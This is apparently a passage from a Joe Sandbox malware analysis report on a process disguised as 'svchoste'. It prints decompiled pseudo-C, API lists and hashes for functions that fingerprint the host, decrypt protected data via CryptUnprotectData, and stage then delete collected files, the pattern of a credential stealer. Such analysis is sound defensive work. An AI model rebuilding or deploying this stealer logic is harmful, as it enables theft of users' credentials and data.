Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a149fb7c0428e46b37dfa508aeb5d8bfe92e6c3a6d5978a236f7c5bbf46a5f73
Instruction ID: 88c52b70867b7a543aa8c19d5caaec037d00efffefa7d96824dfaa8b1ae0b9b5
Opcode Fuzzy Hash: a149fb7c0428e46b37dfa508aeb5d8bfe92e6c3a6d5978a236f7c5bbf46a5f73
Instruction Fuzzy Hash: D651F974A10219EFDB04DFA8D894FAEB7F1BF48304F108559E815AB391D735A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B160, Relevance: 6.0, APIs: 4, Instructions: 34
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B8B160() {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v140;
				intOrPtr* _v144;
				signed int _t9;
				int _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t26;
				signed int _t27;

				_t9 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t9 ^ _t27;
				_t12 = GetCurrentHwProfileA( &_v140); // executed
				if(_t12 == 0) {
					_t13 =  *0xba22d4; // 0x2d06830
				} else {
					_v144 = HeapAlloc(GetProcessHeap(), 0, 0x64);
					_t24 = _v144;
					 *_v144 = 0;
					 *0xba28c4(_v144,  &(_v140.szHwProfileGuid));
					_t13 = _v144;
				}
				return E00B74354(_t13, _t19, _v8 ^ _t27, _t24, _t25, _t26);
			}

0x00b8b169
0x00b8b170
0x00b8b17a
0x00b8b182
0x00b8b1c3
0x00b8b184
0x00b8b195
0x00b8b19d
0x00b8b1a3
0x00b8b1b3
0x00b8b1b9
0x00b8b1b9
0x00b8b1d5

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00B8B17A
GetProcessHeap.KERNEL32(00000000,00000064), ref: 00B8B188
HeapAlloc.KERNEL32(00000000), ref: 00B8B18F
lstrcat.KERNEL32(?,?), ref: 00B8B1B3

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Heap$AllocCurrentProcessProfilelstrcat
String ID:
API String ID: 1316908231-0
Opcode ID: 2b4dac0ac0eec8ecbf51c7e82922c22084850a68ceaae648d5c34ea214193bc0
Instruction ID: 2e45a51be24f43fb13e445488d996d3f76764ef096b427f1320f9c41e1a09060
Opcode Fuzzy Hash: 2b4dac0ac0eec8ecbf51c7e82922c22084850a68ceaae648d5c34ea214193bc0
Instruction Fuzzy Hash: 5C01BB71A00209DBDB18EF65DD56F99B7B8BB09701F008095B94AE7290DE349948CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CB10, Relevance: 4.6, APIs: 3, Instructions: 51
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B8CB10(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t23;

				_v16 = _a4;
				_v20 = _a8;
				_t23 =  *0xba27e0( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_v24 = _t23;
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E00B79240( *_a12, _v8,  *_a16);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _v24 != 0x00000000;
			}

0x00b8cb19
0x00b8cb1f
0x00b8cb34
0x00b8cb3a
0x00b8cb41
0x00b8cb49
0x00b8cb5c
0x00b8cb64
0x00b8cb76
0x00b8cb7b
0x00b8cb64
0x00b8cb92

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B8CB34
LocalAlloc.KERNEL32(00000040,00000000), ref: 00B8CB53
LocalFree.KERNEL32(?), ref: 00B8CB82

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 088ed801198f54a67dd77fd81487cf6d6e336dccceb3abca969712155c3f4429
Instruction ID: a361a27b9369706e85b1a3da1f2514a0bd523ce5623dbc43eca22e6e9e096eb4
Opcode Fuzzy Hash: 088ed801198f54a67dd77fd81487cf6d6e336dccceb3abca969712155c3f4429
Instruction Fuzzy Hash: 7211FAB4900209EFCB04DF98D945AAE77B5FF89300F104598E815A7350D734AE50CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B1E0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B8B1E0() {
				long _v8;
				signed int _v12;
				char _v276;
				signed int _t7;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t7 ^ _t20;
				_v8 = 0x104;
				GetUserNameA( &_v276,  &_v8); // executed
				return E00B74354( &_v276, _t13, _v12 ^ _t20, _t17, _t18, _t19);
			}

0x00b8b1e9
0x00b8b1f0
0x00b8b1f3
0x00b8b205
0x00b8b21e

APIs

GetUserNameA.ADVAPI32(?,00000104), ref: 00B8B205

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2f702210985705956ca5c81efbeafea03e4b2431165b97a877b77bb264ccdace
Instruction ID: 08408be88a185f3fca2e931fa604817835d67ba5657dc0e8b0c3deec441ae951
Opcode Fuzzy Hash: 2f702210985705956ca5c81efbeafea03e4b2431165b97a877b77bb264ccdace
Instruction Fuzzy Hash: 9EE0BF71D0010C9BCB19EFA4D986AEDB7F8AB0C304F5145EAA52997240DB756A88CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B4E0, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8B4E0() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}

0x00b8b4ea
0x00b8b4f6

APIs

GetSystemInfo.KERNEL32(?), ref: 00B8B4EA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 4cbe674a0e015a67b526887a30d8d76f33a8512af2cf7d4b70d3de0e5ea51200
Instruction ID: bfae1d97136a6506801b35de8882c8f2936aca0b6fa0da860a89f805672d244d
Opcode Fuzzy Hash: 4cbe674a0e015a67b526887a30d8d76f33a8512af2cf7d4b70d3de0e5ea51200
Instruction Fuzzy Hash: 7EC04C7590420C978A00EBE9994A8AAB7BCE609501B400591ED1993740EA21ED5486E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B90BE0, Relevance: 84.5, APIs: 56, Instructions: 529
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00B90BE0(void* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v1024;
				char _v1352;
				char _v41352;
				char _v42352;
				char _v43352;
				char _v44352;
				char _v45352;
				char _v46352;
				char _v47352;
				char _v48352;
				char _v49352;
				char _v50352;
				char _v51352;
				char _v52352;
				char _v53352;
				char _v54352;
				char _v55352;
				char _v56352;
				void* _v56356;
				void* _v56360;
				char _v56361;
				void* _v56368;
				unsigned int _v56372;
				void* _v56376;
				char _v56377;
				void* _v56384;
				void* _v56388;
				char _v56389;
				void* _v56396;
				signed int _v56400;
				void* _v56404;
				char _v56405;
				intOrPtr* _v56412;
				intOrPtr _v56416;
				char _v56417;
				intOrPtr _v56424;
				void* __edi;
				void* __esi;
				signed int _t155;
				signed int _t156;
				CHAR* _t182;
				CHAR* _t184;
				CHAR* _t186;
				CHAR* _t188;
				CHAR* _t190;
				CHAR* _t192;
				CHAR* _t194;
				CHAR* _t196;
				void* _t202;
				CHAR* _t205;
				intOrPtr _t215;
				CHAR* _t220;
				CHAR* _t225;
				CHAR* _t230;
				intOrPtr _t253;
				intOrPtr _t257;
				CHAR* _t260;
				CHAR* _t269;
				CHAR* _t273;
				void* _t277;
				intOrPtr _t313;
				intOrPtr _t317;
				CHAR* _t319;
				CHAR* _t321;
				intOrPtr _t332;
				CHAR* _t337;
				CHAR* _t338;
				CHAR* _t339;
				signed int _t350;
				int _t353;
				signed int _t361;
				int _t364;
				intOrPtr _t371;
				intOrPtr _t372;
				intOrPtr _t373;
				intOrPtr _t374;
				intOrPtr _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				intOrPtr _t378;
				CHAR* _t379;
				CHAR* _t380;
				intOrPtr _t384;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t403;
				CHAR* _t404;
				CHAR* _t405;
				signed int _t411;
				void* _t415;
				void* _t416;
				void* _t425;
				void* _t426;
				signed int _t427;
				void* _t428;
				void* _t466;
				void* _t470;
				void* _t475;

				_t475 = __eflags;
				_t294 = __ebx;
				E00B82A40(0xdc58);
				_t155 =  *0xba01f4; // 0xac8b3e58
				_t156 = _t155 ^ _t427;
				_v24 = _t156;
				 *[fs:0x0] =  &_v16;
				E00B791C0( &_v42352, 0, 0x3e8);
				E00B791C0( &_v56352, 0, 0x3e8);
				E00B791C0( &_v55352, 0, 0x3e8);
				E00B791C0( &_v47352, 0, 0x3e8);
				E00B791C0( &_v52352, 0, 0x3e8);
				E00B791C0( &_v54352, 0, 0x3e8);
				E00B791C0( &_v1024, 0, 0x3e8);
				E00B791C0( &_v53352, 0, 0x3e8);
				E00B791C0( &_v46352, 0, 0x3e8);
				E00B791C0( &_v51352, 0, 0x3e8);
				E00B791C0( &_v49352, 0, 0x3e8);
				E00B791C0( &_v45352, 0, 0x3e8);
				E00B791C0( &_v48352, 0, 0x3e8);
				E00B791C0( &_v50352, 0, 0x3e8);
				E00B791C0( &_v44352, 0, 0x3e8);
				E00B791C0( &_v43352, 0, 0x3e8);
				E00B791C0( &_v41352, 0, 0x9c40);
				E00B91620( &_v1352, _t415, _t425, 0xb994cf, 0xfde9, 0, 0, 0); // executed
				_v8 = 0;
				_t371 =  *0xba26d8; // 0xb9a088
				_t182 =  *0xba2244; // 0x2d00590
				wsprintfA( &_v46352, _t182, _t371);
				_t372 =  *0xba26d8; // 0xb9a088
				_t184 =  *0xba2520; // 0x2d058f0
				wsprintfA( &_v51352, _t184, _t372);
				_t373 =  *0xba26d8; // 0xb9a088
				_t186 =  *0xba252c; // 0x2d05878
				wsprintfA( &_v49352, _t186, _t373);
				_t374 =  *0xba26d8; // 0xb9a088
				_t188 =  *0xba26e4; // 0x2d05890
				wsprintfA( &_v45352, _t188, _t374);
				_t375 =  *0xba26d8; // 0xb9a088
				_t190 =  *0xba259c; // 0x2d05830
				wsprintfA( &_v48352, _t190, _t375);
				_t376 =  *0xba26d8; // 0xb9a088
				_t192 =  *0xba256c; // 0x2d05848
				wsprintfA( &_v50352, _t192, _t376);
				_t377 =  *0xba26d8; // 0xb9a088
				_t194 =  *0xba2294; // 0x2d05860
				wsprintfA( &_v44352, _t194, _t377);
				_t378 =  *0xba26d8; // 0xb9a088
				_t196 =  *0xba22e8; // 0x2d05920
				wsprintfA( &_v43352, _t196, _t378);
				_t379 =  *0xba2570; // 0x2d00560
				 *0xba28c4( &_v55352, _t379, _t156, _t415, _t425,  *[fs:0x0], E00B9673D, 0xffffffff);
				 *0xba28c4( &_v55352, E00B8A580(_t379, _t415, _t425, _t475, 0xf));
				_t202 = E00B8A580(_t379, _t415, _t425, _t475, 0xa);
				_t380 =  *0xba26f4; // 0x2d01528
				wsprintfA( &_v56352, _t380, _t202);
				_t205 =  *0xba22bc; // 0x2d00540
				wsprintfA( &_v42352, _t205,  &_v55352,  &_v56352);
				 *0xba28c4( &_v47352,  &_v55352);
				_t313 =  *0xba22e0; // 0x2d058d8
				 *0xba28c4( &_v47352, _t313);
				 *0xba28c4( &_v52352,  &_v55352);
				_t384 =  *0xba26a0; // 0x2d01538
				 *0xba28c4( &_v52352, _t384);
				 *0xba28c4( &_v54352,  &_v55352);
				_t215 =  *0xba22c4; // 0x2d05908
				 *0xba28c4( &_v54352, _t215);
				 *0xba28c4( &_v1024,  &_v55352);
				_t317 =  *0xba20c4; // 0x2d07ef8
				 *0xba28c4( &_v1024, _t317);
				_t220 =  *0xba2618; // 0x2d01500
				E00B90080(__ebx, _t415, _t425, _t475,  &_v50352, _t220); // executed
				_t388 =  *0xba2568; // 0x2d01438
				E00B90080(__ebx, _t415, _t425, _t475,  &_v46352, _t388); // executed
				_t319 =  *0xba22f0; // 0x2d01460
				E00B90080(__ebx, _t415, _t425, _t475,  &_v51352, _t319); // executed
				_t225 =  *0xba2398; // 0x2d01488
				E00B90080(_t294, _t415, _t425, _t475,  &_v49352, _t225); // executed
				_t390 =  *0xba2458; // 0x2d014b0
				E00B90080(_t294, _t415, _t425, _t475,  &_v45352, _t390); // executed
				_t321 =  *0xba2440; // 0x2d014d8
				E00B90080(_t294, _t415, _t425, _t475,  &_v48352, _t321); // executed
				_t230 =  *0xba20f4; // 0x2d015c0
				E00B90080(_t294, _t415, _t425, _t475,  &_v44352, _t230); // executed
				CreateDirectoryA( &_v55352, 0); // executed
				CreateDirectoryA( &_v47352, 0); // executed
				CreateDirectoryA( &_v52352, 0); // executed
				CreateDirectoryA( &_v54352, 0); // executed
				CreateDirectoryA( &_v1024, 0); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				_push( &_v55352); // executed
				E00B8EBD0(_t294, _t415, _t425); // executed
				SetCurrentDirectoryA( &_v55352); // executed
				E00B8F330( &_v55352); // executed
				E00B94F00(_t294, _t415, _t425,  &_v55352); // executed
				_t466 = _t428 + 0x190;
				SetCurrentDirectoryA( &_v55352); // executed
				if(E00B92460(_t294,  &_v1352, _t415, _t425,  &_v43352) != 0) {
					_v56356 = E00B914D0( &_v1352);
					_v56360 = _v56356;
					do {
						_v56361 =  *_v56356;
						_v56356 = _v56356 + 1;
					} while (_v56361 != 0);
					_v56368 = _v56360;
					_v56372 = _v56356 - _v56360;
					_v56376 =  &_v41352 + 0xffffffff;
					do {
						_v56377 =  *((intOrPtr*)(_v56376 + 1));
						_v56376 = _v56376 + 1;
					} while (_v56377 != 0);
					_t425 = _v56368;
					_t361 = _v56372 >> 2;
					_t364 = memcpy(_v56376, _t425, _t361 << 2) & 0x00000003;
					memcpy(_t425 + _t361 + _t361, _t425, _t364);
					_t466 = _t466 + 0x18;
					_t415 = _t425 + _t364 + _t364;
				}
				E00B91580( &_v1352);
				E00B90A30(_t294, _t415, _t425,  &_v41352,  &_v55352);
				SetCurrentDirectoryA( &_v55352); // executed
				E00B8FC30(_t294,  &_v55352, _t415, _t425); // executed
				_t253 = E00B86CE0( &_v56352, 0); // executed
				_v20 = _t253;
				E00B90540(_t294, _t415, _t425, _v20, 0xb994df,  &_v55352); // executed
				E00B87A10(_v20); // executed
				_t470 = _t466 + 0x20;
				_t257 =  *0xba20e8; // 0x2d01548
				E00B918C0(_t294,  &_v1352,  &_v56352, _t415, _t425, _t257,  &_v56352);
				_t332 =  *0xba26d8; // 0xb9a088
				if(E00B92460(_t294,  &_v1352, _t415, _t425, _t332) != 0) {
					_v56384 = E00B914D0( &_v1352);
					_v56388 = _v56384;
					do {
						_v56389 =  *_v56384;
						_v56384 = _v56384 + 1;
					} while (_v56389 != 0);
					_v56396 = _v56388;
					_v56400 = _v56384 - _v56388;
					_v56404 =  &_v53352 + 0xffffffff;
					do {
						_v56405 =  *((intOrPtr*)(_v56404 + 1));
						_v56404 = _v56404 + 1;
					} while (_v56405 != 0);
					_t425 = _v56396;
					_t411 = _v56400;
					_t350 = _t411 >> 2;
					memcpy(_v56404, _t425, _t350 << 2);
					_t353 = _t411 & 0x00000003;
					memcpy(_t425 + _t350 + _t350, _t425, _t353);
					_t470 = _t470 + 0x18;
					_t415 = _t425 + _t353 + _t353;
				}
				_t260 =  *0xba2570; // 0x2d00560
				SetCurrentDirectoryA(_t260); // executed
				_v56412 =  &_v53352;
				_v56416 = _v56412 + 1;
				do {
					_v56417 =  *_v56412;
					_v56412 = _v56412 + 1;
				} while (_v56417 != 0);
				_v56424 = _v56412 - _v56416;
				_t488 = _v56424 - 4;
				if(_v56424 > 4) {
					E00B90130(_t294, _t415, _t425, _t488,  &_v53352);
					_t470 = _t470 + 4;
				}
				E00B8F540( &_v55352); // executed
				_t403 =  *0xba2570; // 0x2d00560
				SetCurrentDirectoryA(_t403); // executed
				RemoveDirectoryA( &_v55352);
				_t337 =  *0xba2568; // 0x2d01438
				DeleteFileA(_t337);
				_t404 =  *0xba22f0; // 0x2d01460
				DeleteFileA(_t404);
				_t269 =  *0xba2398; // 0x2d01488
				DeleteFileA(_t269);
				_t338 =  *0xba2458; // 0x2d014b0
				DeleteFileA(_t338);
				_t405 =  *0xba2440; // 0x2d014d8
				DeleteFileA(_t405);
				_t273 =  *0xba2618; // 0x2d01500
				DeleteFileA(_t273);
				_t339 =  *0xba20f4; // 0x2d015c0
				DeleteFileA(_t339); // executed
				E00B8A720(_t294, _t415, _t425, _t488,  &_v55352); // executed
				_v8 = 0xffffffff;
				_t277 = E00B915C0( &_v1352); // executed
				 *[fs:0x0] = _v16;
				_pop(_t416);
				_pop(_t426);
				return E00B74354(_t277, _t294, _v24 ^ _t427,  &_v55352, _t416, _t426);
			}

0x00b90be0
0x00b90be0
0x00b90bf6
0x00b90bfb
0x00b90c00
0x00b90c02
0x00b90c0b
0x00b90c1f
0x00b90c35
0x00b90c4b
0x00b90c61
0x00b90c77
0x00b90c8d
0x00b90ca3
0x00b90cb9
0x00b90ccf
0x00b90ce5
0x00b90cfb
0x00b90d11
0x00b90d27
0x00b90d3d
0x00b90d53
0x00b90d69
0x00b90d7f
0x00b90d9d
0x00b90da2
0x00b90da9
0x00b90db0
0x00b90dbd
0x00b90dc6
0x00b90dcd
0x00b90dda
0x00b90de3
0x00b90dea
0x00b90df7
0x00b90e00
0x00b90e07
0x00b90e14
0x00b90e1d
0x00b90e24
0x00b90e31
0x00b90e3a
0x00b90e41
0x00b90e4e
0x00b90e57
0x00b90e5e
0x00b90e6b
0x00b90e74
0x00b90e7b
0x00b90e88
0x00b90e91
0x00b90e9f
0x00b90eb7
0x00b90ebf
0x00b90ec8
0x00b90ed6
0x00b90eed
0x00b90efa
0x00b90f11
0x00b90f17
0x00b90f25
0x00b90f39
0x00b90f3f
0x00b90f4d
0x00b90f61
0x00b90f67
0x00b90f74
0x00b90f88
0x00b90f8e
0x00b90f9c
0x00b90fa2
0x00b90faf
0x00b90fb7
0x00b90fc5
0x00b90fcd
0x00b90fdb
0x00b90fe3
0x00b90ff0
0x00b90ff8
0x00b91006
0x00b9100e
0x00b9101c
0x00b91024
0x00b91031
0x00b91042
0x00b91051
0x00b91060
0x00b9106f
0x00b9107e
0x00b9108b
0x00b91097
0x00b91098
0x00b910a7
0x00b910ad
0x00b910b9
0x00b910be
0x00b910c8
0x00b910e2
0x00b910f3
0x00b910ff
0x00b91105
0x00b9110d
0x00b91113
0x00b9111a
0x00b91135
0x00b9113b
0x00b9114a
0x00b91150
0x00b91159
0x00b9115f
0x00b91166
0x00b91175
0x00b91183
0x00b9118a
0x00b9118d
0x00b9118d
0x00b9118d
0x00b9118d
0x00b91195
0x00b911a8
0x00b911b7
0x00b911bd
0x00b911cb
0x00b911d3
0x00b911e6
0x00b911f2
0x00b911f7
0x00b91201
0x00b9120d
0x00b91212
0x00b91226
0x00b91237
0x00b91243
0x00b91249
0x00b91251
0x00b91257
0x00b9125e
0x00b91279
0x00b9127f
0x00b9128e
0x00b91294
0x00b9129d
0x00b912a3
0x00b912aa
0x00b912b9
0x00b912bf
0x00b912c7
0x00b912ca
0x00b912ce
0x00b912d1
0x00b912d1
0x00b912d1
0x00b912d1
0x00b912d3
0x00b912d9
0x00b912e5
0x00b912f4
0x00b912fa
0x00b91302
0x00b91308
0x00b9130f
0x00b91324
0x00b9132a
0x00b91331
0x00b9133a
0x00b9133f
0x00b9133f
0x00b91349
0x00b91351
0x00b91358
0x00b91365
0x00b9136b
0x00b91372
0x00b91378
0x00b9137f
0x00b91385
0x00b9138b
0x00b91391
0x00b91398
0x00b9139e
0x00b913a5
0x00b913ab
0x00b913b1
0x00b913b7
0x00b913be
0x00b913cb
0x00b913d3
0x00b913e0
0x00b913e8
0x00b913f0
0x00b913f1
0x00b913ff

APIs

_memset.LIBCMT ref: 00B90C1F
_memset.LIBCMT ref: 00B90C35
_memset.LIBCMT ref: 00B90C4B
_memset.LIBCMT ref: 00B90C61
_memset.LIBCMT ref: 00B90C77
_memset.LIBCMT ref: 00B90C8D
_memset.LIBCMT ref: 00B90CA3
_memset.LIBCMT ref: 00B90CB9
_memset.LIBCMT ref: 00B90CCF
_memset.LIBCMT ref: 00B90CE5
_memset.LIBCMT ref: 00B90CFB
_memset.LIBCMT ref: 00B90D11
_memset.LIBCMT ref: 00B90D27
_memset.LIBCMT ref: 00B90D3D
_memset.LIBCMT ref: 00B90D53
_memset.LIBCMT ref: 00B90D69
_memset.LIBCMT ref: 00B90D7F

Part of subcall function 00B91620: _memset.LIBCMT ref: 00B91634
Part of subcall function 00B91620: _strcpy_s.LIBCMT ref: 00B91653
Part of subcall function 00B91620: _memset.LIBCMT ref: 00B9168E

wsprintfA.USER32 ref: 00B90DBD
wsprintfA.USER32 ref: 00B90DDA
wsprintfA.USER32 ref: 00B90DF7
wsprintfA.USER32 ref: 00B90E14
wsprintfA.USER32 ref: 00B90E31
wsprintfA.USER32 ref: 00B90E4E
wsprintfA.USER32 ref: 00B90E6B
wsprintfA.USER32 ref: 00B90E88
lstrcat.KERNEL32(?,02D00560), ref: 00B90E9F

Part of subcall function 00B8A580: _malloc.LIBCMT ref: 00B8A58A
Part of subcall function 00B8A580: GetTickCount.KERNEL32 ref: 00B8A59B
Part of subcall function 00B8A580: _rand.LIBCMT ref: 00B8A5C4
Part of subcall function 00B8A580: wsprintfA.USER32 ref: 00B8A5E0

lstrcat.KERNEL32(?,00000000), ref: 00B90EB7
wsprintfA.USER32 ref: 00B90ED6
wsprintfA.USER32 ref: 00B90EFA
lstrcat.KERNEL32(?,?), ref: 00B90F11
lstrcat.KERNEL32(?,02D058D8), ref: 00B90F25
lstrcat.KERNEL32(?,?), ref: 00B90F39
lstrcat.KERNEL32(?,02D01538), ref: 00B90F4D
lstrcat.KERNEL32(?,?), ref: 00B90F61
lstrcat.KERNEL32(?,02D05908), ref: 00B90F74
lstrcat.KERNEL32(?,?), ref: 00B90F88
lstrcat.KERNEL32(?,02D07EF8), ref: 00B90F9C
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B91042
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B91051
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B91060
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B9106F
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B9107E
SetCurrentDirectoryA.KERNEL32(?), ref: 00B9108B

Part of subcall function 00B8EBD0: _memset.LIBCMT ref: 00B8EBF8

SetCurrentDirectoryA.KERNEL32(?), ref: 00B910A7

Part of subcall function 00B94F00: _memset.LIBCMT ref: 00B94F0F
Part of subcall function 00B94F00: lstrcat.KERNEL32(C:\\ProgramData\\216363876181815,00B910BE), ref: 00B94F20

SetCurrentDirectoryA.KERNEL32(?), ref: 00B910C8

Part of subcall function 00B92460: __mbstowcs_l.LIBCMTD ref: 00B92593

SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 00B911B7
SetCurrentDirectoryA.KERNEL32(02D00560,00B9A088,02D01548,?,?,?,?,?,?,?,?,?), ref: 00B912D9
SetCurrentDirectoryA.KERNEL32(02D00560,?,?,?,?,?,?,?,?,?), ref: 00B91358
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B91365
DeleteFileA.KERNEL32(02D01438,?,?,?,?,?,?,?,?,?), ref: 00B91372
DeleteFileA.KERNEL32(02D01460,?,?,?,?,?,?,?,?,?), ref: 00B9137F
DeleteFileA.KERNEL32(02D01488,?,?,?,?,?,?,?,?,?), ref: 00B9138B
DeleteFileA.KERNEL32(02D014B0,?,?,?,?,?,?,?,?,?), ref: 00B91398
DeleteFileA.KERNEL32(02D014D8,?,?,?,?,?,?,?,?,?), ref: 00B913A5
DeleteFileA.KERNEL32(02D01500,?,?,?,?,?,?,?,?,?), ref: 00B913B1
DeleteFileA.KERNEL32(02D015C0,?,?,?,?,?,?,?,?,?), ref: 00B913BE

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset$Directory$lstrcatwsprintf$DeleteFile$Current$Create$CountRemoveTick__mbstowcs_l_malloc_rand_strcpy_s
String ID:
API String ID: 3016932189-0
Opcode ID: fb27c22c2241d46cd5db262a5b04dfbdabc0e780eded9e4b6a3e882c1ccc7769
Instruction ID: 667042444fd8bc932b1c9a27efcf49d377fb99ec7d2068ad7d710689dbe84104
Opcode Fuzzy Hash: fb27c22c2241d46cd5db262a5b04dfbdabc0e780eded9e4b6a3e882c1ccc7769
Instruction Fuzzy Hash: EE22E972D00219ABDB14EBA8DD46EDE73B8BB49700F0445D6F609A3291DF749B88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8FC30, Relevance: 76.8, APIs: 51, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00B8FC30(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ebp;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t57;
				void* _t61;
				void* _t69;
				void* _t81;
				void* _t85;
				void* _t89;
				void* _t93;
				void* _t97;
				void* _t104;
				void* _t108;
				void* _t120;
				void* _t135;
				void* _t151;
				intOrPtr _t157;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t207;

				_t210 = __esi;
				_t209 = __edi;
				_t155 = __ebx;
				_t55 =  *0xba21d0; // 0x2d010d8
				_t157 =  *0xba2608; // 0x2d010e8
				_t56 = E00B755AB(_t157, _t55); // executed
				_v8 = _t56;
				_t266 = _v8;
				if(_v8 != 0) {
